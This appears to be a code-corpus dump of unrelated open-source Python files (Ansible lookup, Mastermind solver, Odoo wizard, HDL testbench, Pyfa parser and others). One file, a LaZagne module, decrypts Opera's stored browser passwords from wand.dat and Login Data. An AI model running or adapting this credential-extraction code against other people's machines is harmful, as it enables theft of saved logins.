lookup: every
version_added: "QB-0.1.61"
short_description: Returns true for a key every X time delta (per host).
description:
- Returns `True` if more than a specified amount of time has passed
since it last returned `True` for that key for the current
`inventory_hostname` fact.
If it's never returned `True` for the `key` / `inventory_hostname`
combo it will.
This is useful to control updating - things like "run
`apt-get update` if it doesn't look like it's been run in a day",
etcetera.
** WARNING: NOT AT ALL THREAD / CONCURRENCY SAFE **
This is meant for things that you're *rather not* have run too
often, it is not indented for and should not be used for
controlling stuff that *must not* be run more than a certain
frequency because it's a shit-simple implementation with
**NO LOCKING / CONCURRENCY SUPPORT** so if another thread or
process is trying to do the same thing at the same time they will
potentially both return `True` or who really knows what else.
Data is stored at `~/.ansible/qb/data/every.yml`. This should
probably be configurable for for the moment it will do.
options:
key:
description:
- Required single positional argument, used as the key to
store / retrieve data.
required: True
**kwargs:
description:
- Accepts all the Python `datetime.timedelta` constructor
keywords. Requires at least one.
You can set the delta to zero (so it returns True every
call) by providing `days=0` or similar (useful to test
stuff out maybe).
required: True
EXAMPLES:
- name: Install Yarn via Homebrew, updating Homebrew at most once per day
homebrew:
name: yarn
update_homebrew: "{{ lookup('every', 'update_homebrew' days=1) }}"
RETURN:
`True` if it's been more than the provided period since the lookup returned
`True` last for this key /
"""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.errors import AnsibleError
from ansible.plugins.lookup import LookupBase
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
from datetime import datetime, timedelta
import os
import errno
import yaml
def mkdir_p(path):
"""
Can't believe Python doesn't have this built-in...
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class LookupModule(LookupBase):
def run(self, terms, variables=None, **kwargs):
# Check args
if len(terms) != 1:
raise AnsibleError(
"Requires exacty one positional argument (key)."
)
if len(kwargs) == 0:
raise AnsibleError(
"Requires at least one Python timedelta keyword arg."
)
# Setup variables
key = terms[0]
host = variables['inventory_hostname']
data_path = os.path.join(
variables['ansible_env']['HOME'],
'.ansible',
'qb',
'data',
'every.yml'
)
delta = timedelta(**kwargs)
now = datetime.now()
# Default to empty data
data = {}
# No idea how / where to see this output...
# display.debug("Seeing if %s has been done in last %s" % (key, delta))
# Ensure the data directory exists
mkdir_p(os.path.dirname(data_path))
# Read the data file, overwriting `data` var (if file it exists)
try:
with open(data_path, 'r') as f:
data = yaml.safe_load(f)
except IOError as error:
pass
# If there's no entry for this host default to empty dict
if host not in data:
data[host] = {}
# Default `should` (our return value) to True: if it's never returned
# `True` it will now.
should = True
# If we have `data[host][key]['last']`, see if's been at least `delta`
# and set `should`
if key in data[host]:
if 'last' in data[host][key]:
should = (now - delta) >= data[host][key]['last']
else:
# Create a new dict at `data[host][key]` so we can write `now` to
# it
data[host][key] = {}
# If we're gonna return `True`, set `last` to `now` and write back
# to the path.
#
# WARNING Not at all thread / concurrency safe!
if should:
data[host][key]['last'] = now
with open(data_path, 'w') as f:
yaml.safe_dump(data, f, default_flow_style=False)
# And return our result
return should
| nrser/qb | plugins/lookup/every_lookups.py | Python | mit | 5,413 |
"""
pyexcel.plugins.sources.sqlalchemy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Representation of sqlalchemy sources
:copyright: (c) 2015-2020 by Onni Software Ltd.
:license: New BSD License
"""
from pyexcel_io.constants import DB_SQL
from .db_sources import BookDbSource, SheetDbSource
class SheetSQLAlchemySource(SheetDbSource):
"""
SQLAlchemy channeled sql database as data source
"""
def __init__(
self, session, table, export_columns=None, sheet_name=None, **keywords
):
self.__session = session
self.__table = table
SheetDbSource.__init__(
self,
DB_SQL,
export_columns=export_columns,
sheet_name=sheet_name,
**keywords
)
def get_export_params(self):
return (self.__session, [self.__table])
def get_import_params(self):
return (self.__session, self.__table)
class BookSQLSource(BookDbSource):
"""
SQLAlchemy bridged multiple table data source
"""
def __init__(self, session, tables, **keywords):
self.__session = session
self.__tables = tables
BookDbSource.__init__(self, DB_SQL, **keywords)
def get_params(self):
return (self.__session, self.__tables)
| chfw/pyexcel | pyexcel/plugins/sources/sqlalchemy.py | Python | bsd-3-clause | 1,279 |
import itertools
class mind:
"""
Třída řešící hru Mastermind ve třech úrovních obtížnosti.
Podporované módy:
1) Hádání 4 pozic se 6 barvami
2) Hádání 5 pozic s 7 barvami
3) Hádání 6 pozic s 8 barvami
O zadání, učování správného řešení a ohodnocování jednotlivých tahů
se stará třída master.
V prvním kole se pro každý herní mód využije pevně danný tah. Ten by
měl pro další kola vyloučit co nejvyšší množství "potencíálních"
řešení.
Po ohodnocení prvního kola (zajišťuje master), jsou z množiny všech
možných řešení dané úlohy vyloučeny ty nesprávné. Tedy ty, pro
které by (pokud by byly hledaným řešením úlohy) nemohl naposledy
hraný tah získat stejné ohodnocení, které dostal.
Postup se opakuje, dokud není množina všech řešení dostatečně malá
(moemntálně pod 1000 prvků). Zde přichází do hry výběr nejlepšího
dalšího tahu. Za ten je považován tah, který je nejvíce podobný
ostatním (má nejvyšší součetsoučtu vůči ostatním nejvyšší skóre).
"""
def __init__(self):
# Kódové označení
self.codename = "up to 32 characters"
# Herní mód - obsahuje čísla 4 (4 ze 6), 5 (5 ze 7), 6 (6 z 8)
self.game_mode = 0
# Set s všemi možnými řešeními aktuální úlohy
self.possibilities = set()
# Jde o první tah?
self.first_guess = True
# Ohodnocení posledního pokusu o řešení
self.last_score = 0
# Cache vzájemného ohodnocení dvou možností
self.cache = {}
def init(self, numbers, positions):
"""
Metoda volaná po každé změně obtížnosti (herního typu), aby se
nastavilo vše potřebné.
Parametry:
----------
numbers:integer
Počet číslic, které mohou být na jedné pozici v rozsahu
0... numbers-1
positions:integer
Počet pozic.
"""
self.game_mode = positions
self.possibilities = set(itertools.product(range(numbers), repeat=positions))
self.first_guess = True
self.cache = {}
def pick_best_guess(self):
"""
Metoda, jenž se pokusí o nalezení nejlepšího dalšího tahu.
Protože je relativně pomalá (porovnává prvky v poli řešení
každý s každým), měla by se volat až když je pole řešení
menší.
Vrací:
------
set
Nejlepší možný tah.
"""
best = {}
if len(self.possibilities) == 1:
return self.possibilities.pop()
# Kontroluje každý s každým
for guess in self.possibilities:
for compare in self.possibilities:
# Samo se sebou neporovnává
if guess == compare:
continue
# Vytvoří počítadlo
if not guess in best:
best[guess] = 0
# Přičte vzájemné skóre k počítadlu.
best[guess] += self.get_score( guess, compare)
# Vrátí tah s nejvyšším součtem všech skóre
return max(best, key=lambda key: best[key])
def count_matching_colors(self, a, b):
"""
Spočítá počet stejných barev (na různých pozicích) v řešení a
a b.
Parametry:
---------
a:set
Řešení A
b:set
Řešení B
Vrací:
------
integer
Počet stejných barev.
"""
count = 0
a_iterator = iter(sorted(a))
b_iterator = iter(sorted(b))
a_value = next(a_iterator)
b_value = next(b_iterator)
try:
while True:
if a_value == b_value:
count += 1
a_value = next(a_iterator)
b_value = next(b_iterator)
elif a_value < b_value:
a_value = next(a_iterator)
else:
b_value = next(b_iterator)
except StopIteration:
return count
def get_score( self, guess, compare):
"""
Metoda vracející vzájemné ohodnocení dvou možných řešení.
Parametry:
----------
guess:set
Řešení A
compare:set
Řešení B
"""
# Prohledávání cache, zda jsme to už nepočítali.
# Bohužel mě nenapadlo jak vytvořit unikátní klíč
# na základě parametrů guess a compare tak, aby
# nezáleželo na jejich pořadí.
#
# Memoize by asi moc nepomohlo...
a = guess + compare
b = compare + guess
if a in self.cache:
return self.cache[a]
elif b in self.cache:
return self.cache[b]
# Výpočet ohodnocení
key = a
blacks = sum(1 for a, b in zip(guess, compare) if a == b)
color_matches = self.count_matching_colors(guess, compare)
whites = color_matches - blacks
# Uložení do cache
self.cache[key] = blacks * 10 + whites
return blacks * 10 + whites
def guess(self):
guess = 0
if self.first_guess:
self.first_guess = False
if self.game_mode == 4:
guess = (0, 0, 1, 1)
elif self.game_mode == 5:
guess = (0, 0, 1, 1, 2)
elif self.game_mode == 6:
guess = (0, 0, 1, 1, 2, 2)
self.possibilities.remove(guess)
# Čas hledat nejlepší řešení
# Neosvědčilo se
"""
if len(self.possibilities) < 1000:
guess = self.pick_best_guess()
else:
"""
guess = self.possibilities.pop()
return guess
def eval(self, guess, black, white):
self.last_score = black * 10 + white
# Promaže všechny možnosti, která nemohou být řešením
self.possibilities = set(filter(
lambda n: self.get_score(guess,n) == self.last_score,
self.possibilities
)) | malja/cvut-python | cviceni10/mind.py | Python | mit | 6,473 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <[email protected]>
#
# The licence is in the file __openerp__.py
#
##############################################################################
from openerp.osv import orm, fields
from openerp.tools.translate import _
class account_analytic_attribution_wizard(orm.TransientModel):
"""Wizard for performing attribution of analytic lines into
other analytic accounts."""
_name = 'account.analytic.attribution.wizard'
_columns = {
'period_id': fields.many2one(
'account.period', _('Period')),
'fiscalyear_id': fields.many2one(
'account.fiscalyear', _('Fiscal year'))
}
def perform_attribution(self, cr, uid, ids, context=None):
""" Perform analytic attributions. """
if isinstance(ids, list):
# Only one wizard at a time
ids = ids[0]
wizard = self.browse(cr, uid, ids, context)
periods = list()
if context.get('active_model') == 'account.period':
periods = self.pool.get('account.period').browse(
cr, uid, context.get('active_ids'), context)
fiscalyear = wizard.fiscalyear_id
if fiscalyear:
if fiscalyear.state == 'draft':
periods = fiscalyear.period_ids
elif fiscalyear.state == 'done':
raise orm.except_orm(
_("Fiscal Year closed"),
_("You cannot perform the computation on "
"closed fiscal year."))
elif wizard.period_id:
periods = [wizard.period_id]
# Get the attribution analytic journal and root analytic account
data_obj = self.pool.get('ir.model.data')
journal_id = data_obj.get_object_reference(
cr, uid, 'account_analytic_attribution',
'journal_attribution')[1]
attribution_analytic_id = data_obj.get_object_reference(
cr, uid, 'account_analytic_attribution',
'account_analytic_root_to_attribute')[1]
analytic_line_obj = self.pool.get('account.analytic.line')
analytic_default_obj = self.pool.get('account.analytic.default')
generated_lines = list()
for period in periods:
if period.state == 'closed':
# Skip closed periods
continue
# Remove old attributions for avoiding duplicates
old_line_ids = analytic_line_obj.search(cr, uid, [
('journal_id', '=', journal_id),
('date', '>=', period.date_start),
('date', '<=', period.date_stop)], context=context)
analytic_line_obj.unlink(cr, uid, old_line_ids, context)
# Perform the attribution for each analytic line below attribution
# center (root analytic account)
line_ids = analytic_line_obj.search(cr, uid, [
('account_id', 'child_of', attribution_analytic_id),
('date', '>=', period.date_start),
('date', '<=', period.date_stop)], context=context)
generated_lines.extend(analytic_default_obj.perform_attribution(
cr, uid, line_ids, journal_id, period.date_start,
period.date_stop, context))
return {
'name': _('Generated Analytic Lines'),
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'account.analytic.line',
'domain': [('id', 'in', generated_lines)],
'context': {'group_by': ['ref', 'date']},
'type': 'ir.actions.act_window',
}
| ndtran/compassion-accounting | account_analytic_attribution/wizard/account_analytic_attribution_wizard.py | Python | agpl-3.0 | 3,945 |
#!/usr/bin/env python
"""
Copyright (c) 2015-2017 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import axis_ep
module = 'i2c_init'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Parameters
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
m_axis_cmd_ready = Signal(bool(0))
m_axis_data_tready = Signal(bool(0))
start = Signal(bool(0))
# Outputs
m_axis_cmd_address = Signal(intbv(0)[7:])
m_axis_cmd_start = Signal(bool(0))
m_axis_cmd_read = Signal(bool(0))
m_axis_cmd_write = Signal(bool(0))
m_axis_cmd_write_multiple = Signal(bool(0))
m_axis_cmd_stop = Signal(bool(0))
m_axis_cmd_valid = Signal(bool(0))
m_axis_data_tdata = Signal(intbv(0)[8:])
m_axis_data_tvalid = Signal(bool(0))
m_axis_data_tlast = Signal(bool(1))
busy = Signal(bool(0))
# sources and sinks
cmd_sink_pause = Signal(bool(0))
data_sink_pause = Signal(bool(0))
cmd_sink = axis_ep.AXIStreamSink()
cmd_sink_logic = cmd_sink.create_logic(
clk,
rst,
tdata=(m_axis_cmd_address, m_axis_cmd_start, m_axis_cmd_read, m_axis_cmd_write, m_axis_cmd_write_multiple, m_axis_cmd_stop),
tvalid=m_axis_cmd_valid,
tready=m_axis_cmd_ready,
pause=cmd_sink_pause,
name='cmd_sink'
)
data_sink = axis_ep.AXIStreamSink()
data_sink_logic = data_sink.create_logic(
clk,
rst,
tdata=m_axis_data_tdata,
tvalid=m_axis_data_tvalid,
tready=m_axis_data_tready,
tlast=m_axis_data_tlast,
pause=data_sink_pause,
name='data_sink'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
m_axis_cmd_address=m_axis_cmd_address,
m_axis_cmd_start=m_axis_cmd_start,
m_axis_cmd_read=m_axis_cmd_read,
m_axis_cmd_write=m_axis_cmd_write,
m_axis_cmd_write_multiple=m_axis_cmd_write_multiple,
m_axis_cmd_stop=m_axis_cmd_stop,
m_axis_cmd_valid=m_axis_cmd_valid,
m_axis_cmd_ready=m_axis_cmd_ready,
m_axis_data_tdata=m_axis_data_tdata,
m_axis_data_tvalid=m_axis_data_tvalid,
m_axis_data_tready=m_axis_data_tready,
m_axis_data_tlast=m_axis_data_tlast,
busy=busy,
start=start
)
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
# testbench stimulus
yield clk.posedge
print("test 1: run, no delays")
current_test.next = 1
start.next = 1
yield clk.posedge
start.next = 0
yield clk.posedge
yield clk.posedge
while busy:
yield clk.posedge
# addresses and data for checking
addr = [0x50, 0x50, 0x51, 0x52, 0x53]
data = [0x00, 0x04, 0x11, 0x22, 0x33, 0x44]
# check all issued commands
for a in addr:
first = True
for d in data:
f1 = cmd_sink.recv()
f2 = data_sink.recv()
assert f1.data[0][0] == a # address
assert f1.data[0][1] == first # start
assert f1.data[0][2] == 0 # read
assert f1.data[0][3] == 1 # write
assert f1.data[0][4] == 0 # write multiple
assert f1.data[0][5] == 0 # stop
assert f2.data[0] == d
first = False
# check for stop command
f1 = cmd_sink.recv()
assert f1.data[0][1] == 0 # start
assert f1.data[0][2] == 0 # read
assert f1.data[0][3] == 0 # write
assert f1.data[0][4] == 0 # write multiple
assert f1.data[0][5] == 1 # stop
# make sure we got everything
assert cmd_sink.empty()
assert data_sink.empty()
yield delay(100)
# testbench stimulus
yield clk.posedge
print("test 2: run with delays")
current_test.next = 2
start.next = 1
yield clk.posedge
start.next = 0
yield clk.posedge
yield clk.posedge
cmd_sink_pause.next = 0
data_sink_pause.next = 1
while busy:
yield delay(100)
yield clk.posedge
cmd_sink_pause.next = 0
data_sink_pause.next = 1
yield clk.posedge
cmd_sink_pause.next = 1
data_sink_pause.next = 1
yield delay(100)
yield clk.posedge
cmd_sink_pause.next = 1
data_sink_pause.next = 0
yield clk.posedge
cmd_sink_pause.next = 1
data_sink_pause.next = 1
cmd_sink_pause.next = 0
data_sink_pause.next = 0
# addresses and data for checking
addr = [0x50, 0x50, 0x51, 0x52, 0x53]
data = [0x00, 0x04, 0x11, 0x22, 0x33, 0x44]
# check all issued commands
for a in addr:
first = True
for d in data:
f1 = cmd_sink.recv()
f2 = data_sink.recv()
assert f1.data[0][0] == a # address
assert f1.data[0][1] == first # start
assert f1.data[0][2] == 0 # read
assert f1.data[0][3] == 1 # write
assert f1.data[0][4] == 0 # write multiple
assert f1.data[0][5] == 0 # stop
assert f2.data[0] == d
first = False
# check for stop command
f1 = cmd_sink.recv()
assert f1.data[0][1] == 0 # start
assert f1.data[0][2] == 0 # read
assert f1.data[0][3] == 0 # write
assert f1.data[0][4] == 0 # write multiple
assert f1.data[0][5] == 1 # stop
# make sure we got everything
assert cmd_sink.empty()
assert data_sink.empty()
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
| alexforencich/verilog-i2c | tb/test_i2c_init.py | Python | mit | 7,603 |
import os.path
def thumbnails_path(name):
if name is None:
return os.path.join(os.path.dirname(__file__), 'thumbnails')
return os.path.join(os.path.dirname(__file__), 'thumbnails', name)
| relekang/thumbnails.lkng.me | helpers.py | Python | mit | 205 |
import logging
from pathlib import Path
import time
from dstools.pipeline.tasks import PythonCallable
from dstools.pipeline.products import File
from dstools.pipeline import DAG
logging.basicConfig(level=logging.INFO)
def wait(product):
time.sleep(1)
Path(str(product)).touch()
def wait2(product, upstream):
time.sleep(1)
Path(str(product)).touch()
dag = DAG()
t1 = PythonCallable(wait, File('t1'), dag, name='t1')
t2 = PythonCallable(wait, File('t2'), dag, name='t2')
t3 = PythonCallable(wait, File('t3'), dag, name='t3')
t4 = PythonCallable(wait2, File('t4'), dag, name='t4')
t5 = PythonCallable(wait2, File('t5'), dag, name='t5')
t6 = PythonCallable(wait2, File('t6'), dag, name='t6')
t7 = PythonCallable(wait2, File('t7'), dag, name='t7')
(t1 + t2 + t3) >> t4 >> (t5 + t6) >> t7
dag.build(force=True)
| edublancas/python-ds-tools | profiling/pipeline.py | Python | mit | 833 |
import sklearn
import pandas as pd
import numpy as np
from time import gmtime, strftime
from feature_engineer import timer
nrs = np.random.RandomState(0)
def lcc_sample(labels, preds, input_data, C = 1):
"""
Param:
labels shape: (n_sample,)
preds shape: (n_sample,)
input_data shape: (n_sample, feature_dim)
C: times based on accepte_rate
return:
data after sampling
"""
accept_rate = np.abs(labels - preds) * C
bernoulli_z = nrs.binomial(1, np.clip(accept_rate, 0, 1))
select_ind = [i for i in range(bernoulli_z.shape[0]) if bernoulli_z[i] == 1]
sample_data = input_data[select_ind, :]
sample_labels = labels[select_ind]
weight = np.ones(len(labels))
adjust_weight_ind = [i for i in range(len(accept_rate)) if accept_rate[i] > 1]
weight[adjust_weight_ind] = accept_rate[adjust_weight_ind]
weight = weight[select_ind]
print('-----LCC Sampling Before All: {} Pos: {} Neg: {}'.format(len(labels), np.sum(labels == 1), np.sum(labels == 0)))
print('-----LCC Sampling After All: {} Pos: {} Neg: {}'.format(len(sample_labels), np.sum(sample_labels == 1), np.sum(sample_labels == 0)))
print('-----LCC Sampling Rate: {}'.format(float(len(sample_labels)) / float(len(labels))))
return sample_data, sample_labels, weight
def neg_sample(input_data, labels, C = 1):
"""
Param:
labels shape: (n_sample,)
preds shape: (n_sample,)
input_data shape: (n_sample, feature_dim)
C: neg_number = C * pos_number
return:
data after sampling
"""
with timer("Negative sampling"):
print('Negative sampling...')
pos_ind = np.where(labels == 1)[0]
neg_ind = np.where(labels == 0)[0]
accept_rate = float(C * len(pos_ind)) / float(len(neg_ind))
neg_select_ind = nrs.choice(neg_ind, len(pos_ind) * C, replace = True)
select_ind = np.append(pos_ind, neg_select_ind)
nrs.shuffle(select_ind)
sample_data = input_data[select_ind, :]
sample_labels = labels[select_ind]
sample_neg_ind = np.where(sample_labels == 0)[0]
weight = np.ones(len(sample_labels))
weight[sample_neg_ind] = 1.0 / accept_rate
print('-----Neg Sampling Before All: {} Pos: {} Neg: {}'.format(len(labels), np.sum(labels == 1), np.sum(labels == 0)))
print('-----Neg Sampling After All: {} Pos: {} Neg: {}'.format(len(sample_labels), np.sum(sample_labels == 1), np.sum(sample_labels == 0)))
print('-----Neg Sampling Rate: {}'.format(float(len(sample_labels)) / float(len(labels))))
return sample_data, sample_labels, weight
| ifuding/Kaggle | TalkingDataFraudDetect/Code/lcc_sample.py | Python | apache-2.0 | 2,613 |
import numpy as np
from matplotlib.mlab import find
from data_transforms import create_weight
def apply_bound(pred, bounds=(0,1,0)):
"""
This ensures that all views and comments >= 0 and all votes >= 1
"""
pred = (pred >= bounds) * pred + bounds * (pred < bounds)
return pred
def apply_scales(pred, categories, scales):
"""
Applies scales to a prediction given a dict containing scales indexed
by category name and a list of categories
len(categories) == pred.shape[0]
"""
weights = create_weight(categories, scales)
return apply_bound(pred * weights)
| beegieb/kaggle_see_click_fix | predict.py | Python | bsd-3-clause | 608 |
import sys, struct, hashlib, binascii, re, os
from Crypto.Cipher import DES3
from ConfigParser import RawConfigParser
import sqlite3, win32crypt
from config.constant import *
from config.write_output import print_output, print_debug
from config.header import Header
from config.moduleInfo import ModuleInfo
CIPHERED_FILE = ''
class Opera(ModuleInfo):
def __init__(self):
options = {'command': '-o', 'action': 'store_true', 'dest': 'opera', 'help': 'opera'}
ModuleInfo.__init__(self, 'opera', 'browsers', options)
def run(self):
# print title
Header().title_info('Opera')
# retrieve opera folder
path = self.get_path()
if path == 'env_variable_error':
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
return
elif not path:
print_debug('INFO', 'Opera is not installed.')
return
passwords = ''
# old versions
if CIPHERED_FILE == 'wand.dat':
# check the use of master password
if not os.path.exists(path + os.sep + 'operaprefs.ini'):
print_debug('WARNING', 'The preference file operaprefs.ini has not been found.')
return
else:
if self.masterPasswordUsed(path) == '1':
print_debug('WARNING', 'A master password is used.')
elif self.masterPasswordUsed(path) != '0':
print_debug('ERROR', 'An error occurs, the use of master password is not sure.')
passwords = self.decipher_old_version(path)
if passwords:
self.parse_results(passwords)
else:
print_debug('INFO', 'The wand.dat seems to be empty')
# new versions
else:
passwords = self.decipher_new_version(path)
def get_path(self):
global CIPHERED_FILE
if 'APPDATA' in os.environ:
# version less than 10
if os.path.exists(os.environ['APPDATA'] + '\Opera\Opera\profile'):
CIPHERED_FILE = 'wand.dat'
return os.environ['APPDATA'] + '\Opera\Opera\profile'
# version more than 10
if os.path.exists(os.environ['APPDATA'] + '\Opera\Opera'):
CIPHERED_FILE = 'wand.dat'
return os.environ['APPDATA'] + '\Opera\Opera'
# new versions
elif os.path.exists(os.environ['APPDATA'] + '\Opera Software\Opera Stable'):
CIPHERED_FILE = 'Login Data'
return os.environ['APPDATA'] + '\Opera Software\Opera Stable'
else:
return None
else:
return 'env_variable_error'
def decipher_old_version(self, path):
salt = '837DFC0F8EB3E86973AFFF'
# retrieve wand.dat file
if not os.path.exists(path + os.sep + 'wand.dat'):
print_debug('WARNING', 'wand.dat file has not been found.')
return
# read wand.dat
f = open(path + os.sep + 'wand.dat', 'rb')
file = f.read()
fileSize = len(file)
passwords = []
offset = 0
while offset < fileSize:
offset = file.find('\x08', offset) + 1
if offset == 0:
break
tmp_blockLength = offset - 8
tmp_datalen = offset + 8
blockLength = struct.unpack('!i', file[tmp_blockLength : tmp_blockLength + 4])[0]
datalen = struct.unpack('!i', file[tmp_datalen : tmp_datalen + 4])[0]
binary_salt = binascii.unhexlify(salt)
desKey = file[offset: offset + 8]
tmp = binary_salt + desKey
md5hash1 = hashlib.md5(tmp).digest()
md5hash2 = hashlib.md5(md5hash1 + tmp).digest()
key = md5hash1 + md5hash2[0:8]
iv = md5hash2[8:]
data = file[offset + 8 + 4: offset + 8 + 4 + datalen]
des3dec = DES3.new(key, DES3.MODE_CBC, iv)
plaintext = des3dec.decrypt(data)
plaintext = re.sub(r'[^\x20-\x7e]', '', plaintext)
passwords.append(plaintext)
offset += 8 + 4 + datalen
return passwords
def decipher_new_version(self, path):
database_path = path + os.sep + 'Login Data'
if os.path.exists(database_path):
# Connect to the Database
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
# Get the results
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !')
return
pwdFound = []
for result in cursor.fetchall():
values = {}
# Decrypt the Password
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
values['Site'] = result[0]
values['Username'] = result[1]
values['Password'] = password
pwdFound.append(values)
# print the results
print_output("Opera", pwdFound)
else:
print_debug('No passwords stored\nThe database Login Data is not present.')
def masterPasswordUsed(self, path):
# the init file is not well defined so lines have to be removed before to parse it
cp = RawConfigParser()
f = open(path + os.sep + 'operaprefs.ini', 'rb')
f.readline() # discard first line
while 1:
try:
cp.readfp(f)
break
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
f.readline() # discard first line
try:
master_pass = cp.get('Security Prefs','Use Paranoid Mailpassword')
return master_pass
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return False
def parse_results(self, passwords):
cpt = 0
values = {}
pwdFound = []
for password in passwords:
# date (begin of the sensitive data)
match=re.search(r'(\d+-\d+-\d+)', password)
if match:
values = {}
cpt = 0
tmp_cpt = 0
# after finding 2 urls
if cpt == 2:
tmp_cpt += 1
if tmp_cpt == 2:
values['User'] = password
print 'User:' + password
elif tmp_cpt == 4:
values['Password'] = password
# url
match=re.search(r'^http', password)
if match:
cpt +=1
if cpt == 1:
tmp_url = password
elif cpt == 2:
values['URL'] = tmp_url
pwdFound.append(values)
# print the results
print_output("Opera", pwdFound)
| Relin/LaZagne | Windows/src/LaZagne/softwares/browsers/opera.py | Python | lgpl-3.0 | 5,849 |
import logging
import os
class Exporter(object):
def __init__(self, options=None):
self.options = options
self.logger = logging.getLogger(__name__)
self.setup()
def setup(self):
pass
exporters = {}
def register_exporter(klass):
exporters[klass.name] = klass
return klass
def get_exporters():
if exporters:
return exporters
for fname in os.listdir(os.path.dirname(__file__)):
module, ext = os.path.splitext(fname)
if ext.lower() != '.py':
continue
if module in ('__init__', 'base'):
continue
full_path = "%s.%s" % (__package__, module)
ret = __import__(full_path, locals(), globals())
return exporters
| City-of-Helsinki/linkedevents | events/exporter/base.py | Python | mit | 742 |
# =============================================================================
# Copyright (C) 2014 Ryan Holmes
#
# This file is part of pyfa.
#
# pyfa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pyfa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyfa. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
import re
from eos.db.gamedata.queries import getAttributeInfo, getDynamicItem
from eos.utils.float import floatUnerr
from service.port.shared import fetchItem
from service.esiAccess import EsiAccess
def renderMutant(mutant, firstPrefix='', prefix=''):
exportLines = []
mutatedAttrs = {}
for attrID, mutator in mutant.mutators.items():
attrName = getAttributeInfo(attrID).name
mutatedAttrs[attrName] = mutator.value
exportLines.append('{}{}'.format(firstPrefix, mutant.baseItem.name))
exportLines.append('{}{}'.format(prefix, mutant.mutaplasmid.item.name))
customAttrsLine = ', '.join(
'{} {}'.format(a, floatUnerr(mutatedAttrs[a]))
for a in sorted(mutatedAttrs))
exportLines.append('{}{}'.format(prefix, customAttrsLine))
return '\n'.join(exportLines)
def parseMutant(lines):
# Fetch base item type
try:
baseItemName = lines[0]
except IndexError:
return None
baseItem = fetchItem(baseItemName.strip())
if baseItem is None:
return None, None, {}
# Fetch mutaplasmid item type and actual item
try:
mutaplasmidName = lines[1]
except IndexError:
return baseItem, None, {}
mutaplasmidItem = fetchItem(mutaplasmidName.strip())
if mutaplasmidItem is None:
return baseItem, None, {}
mutaplasmidItem = getDynamicItem(mutaplasmidItem.ID)
# Process mutated attribute values
try:
mutationsLine = lines[2]
except IndexError:
return baseItem, mutaplasmidItem, {}
mutations = {}
pairs = [p.strip() for p in mutationsLine.split(',')]
for pair in pairs:
try:
attrName, value = pair.split(' ')
except ValueError:
continue
try:
value = float(value)
except (ValueError, TypeError):
continue
attrInfo = getAttributeInfo(attrName.strip())
if attrInfo is None:
continue
mutations[attrInfo.ID] = value
return baseItem, mutaplasmidItem, mutations
def parseDynamicItemString(text):
m = re.search(r'<url=showinfo:(?P<typeid>\d+)//(?P<itemid>\d+)>.+</url>', text)
if m:
typeID = int(m.group('typeid'))
itemID = int(m.group('itemid'))
return typeID, itemID
return None
def fetchDynamicItem(dynamicItemData):
typeID, itemID = dynamicItemData
esiData = EsiAccess().getDynamicItem(typeID, itemID).json()
baseItemID = esiData['source_type_id']
mutaplasmidID = esiData['mutator_type_id']
attrs = {i['attribute_id']: i['value'] for i in esiData['dogma_attributes']}
baseItem = fetchItem(baseItemID)
mutaplasmid = getDynamicItem(mutaplasmidID)
return baseItem, mutaplasmid, attrs
| pyfa-org/Pyfa | service/port/muta.py | Python | gpl-3.0 | 3,576 |
""" Multiply a signal with a window """
import warnings
import numpy
# These imports are all for loading the functions.yaml file for the abbreviations of functions for benchmarking.
